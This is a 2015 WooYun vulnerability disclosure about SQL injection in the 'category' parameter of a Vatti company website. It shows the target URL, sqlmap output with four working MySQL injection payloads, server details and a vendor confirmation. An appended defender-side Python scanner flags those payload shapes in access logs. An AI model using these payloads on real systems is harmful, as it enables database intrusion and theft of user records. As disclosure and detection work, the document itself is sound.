
Vulnerability Summary

Defect ID: wooyun-2015-0151213

Title: SQL injection in a Vatti website (millions of user records)

Vendor: Vatti Co., Ltd. (华帝股份有限公司)

Author: miracle

Submitted: 2015-11-02 09:52

Fixed: 2015-12-19 10:52

Published: 2015-12-19 10:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2015-11-02: Details sent to the vendor; awaiting vendor response
2015-11-04: Vendor confirmed; details disclosed to the vendor only
2015-11-14: Details disclosed to core white hats and relevant domain experts
2015-11-24: Details disclosed to regular white hats
2015-12-04: Details disclosed to intern white hats
2015-12-19: Details disclosed to the public

Brief description:

Detailed description:

http://vip.vatti.com.cn/index.php?a=designer&c=index&category=1111&m=designer&page=1 Injection point: category

[Screenshot: 11.png]

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: category (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: a=designer&c=index&category=(SELECT (CASE WHEN (9529=9529) THEN 9529 ELSE 9529*(SELECT 9529 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&m=designer&page=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: a=designer&c=index&category=1111 AND (SELECT 1114 FROM(SELECT COUNT(*),CONCAT(0x71706a7071,(SELECT (ELT(1114=1114,1))),0x716b707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&m=designer&page=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: a=designer&c=index&category=1111 AND (SELECT * FROM (SELECT(SLEEP(5)))dNCt)&m=designer&page=1
Type: UNION query
Title: Generic UNION query (NULL) - 30 columns
Payload: a=designer&c=index&category=1111 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7071,0x73656a6a7663694e536f,0x716b707871),NULL-- &m=designer&page=1
---
web server operating system: Windows
web application technology: Apache 2.2.25, PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: hdbbs
[193 tables]

[Screenshot: 22.png]
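As an added defender-side example (not part of the original report), the following Python scans Apache access-log lines for the `category` parameter and flags any value that is not the plain integer id the application expects, naming which of the payload shapes from the sqlmap output above it matches. The log lines, client IPs and signature names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Signatures derived from the payload shapes sqlmap reported above (time-based SLEEP(),
# UNION ALL SELECT NULL,..., error-based FLOOR(RAND(0)*2), INFORMATION_SCHEMA, CASE WHEN).
SIGNATURES = {
    "time-based": re.compile(r"\bSLEEP\s*\(", re.I),
    "union": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(", re.I),
    "schema-probe": re.compile(r"INFORMATION_SCHEMA", re.I),
    "boolean-blind": re.compile(r"\bCASE\s+WHEN\b", re.I),
}

# Apache combined log format: <ip> - - [time] "<method> <target> <proto>" <status> <bytes>
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def inspect_line(line, param="category"):
    """Classify one access-log line. Returns (ip, verdict, reasons), or None if the
    line does not parse. The application expects a numeric category id (the report's
    benign request uses category=1111), so any other value is flagged."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query          # parse_qs percent-decodes the values
    values = parse_qs(query, keep_blank_values=True).get(param, [])
    reasons = []
    for value in values:
        if re.fullmatch(r"\d+", value):
            continue                                    # plain integer: what the app expects
        hits = [name for name, rx in SIGNATURES.items() if rx.search(value)]
        reasons.extend(hits or ["non-numeric"])         # unknown shape is still worth a look
    return (m.group("ip"), "suspicious" if reasons else "ok", reasons)

def scan_log(text, param="category"):
    """Run inspect_line over every line of an access log, skipping unparseable lines."""
    results = [inspect_line(l, param) for l in text.splitlines() if l.strip()]
    return [r for r in results if r is not None]

# Constructed sample log (not taken from the report); the targets mirror the benign URL and
# the time-based and UNION requests shown above, percent-encoded the way Apache logs them.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Nov/2015:09:40:01 +0800] "GET /index.php?a=designer&c=index&category=1111&m=designer&page=1 HTTP/1.1" 200 8812
203.0.113.9 - - [02/Nov/2015:09:41:17 +0800] "GET /index.php?a=designer&c=index&category=1111%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))dNCt)&m=designer&page=1 HTTP/1.1" 200 8812
203.0.113.9 - - [02/Nov/2015:09:41:25 +0800] "GET /index.php?a=designer&c=index&category=1111%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x71706a7071,0x73656a6a7663694e536f,0x716b707871),NULL--%20&m=designer&page=1 HTTP/1.1" 200 9120
"""
```

Calling `scan_log(SAMPLE_LOG)` marks the first request as ok and the two from 203.0.113.9 as suspicious with the time-based and union signatures respectively; a non-numeric value matching no signature is reported as "non-numeric" so it is not silently dropped.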

Proof of vulnerability:

Fix recommendation:

Copyright notice: when republishing, please credit the source: miracle@乌云


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-11-04 10:51

Vendor reply:

Thanks to the author! We will handle it as soon as possible.

Latest status:

None

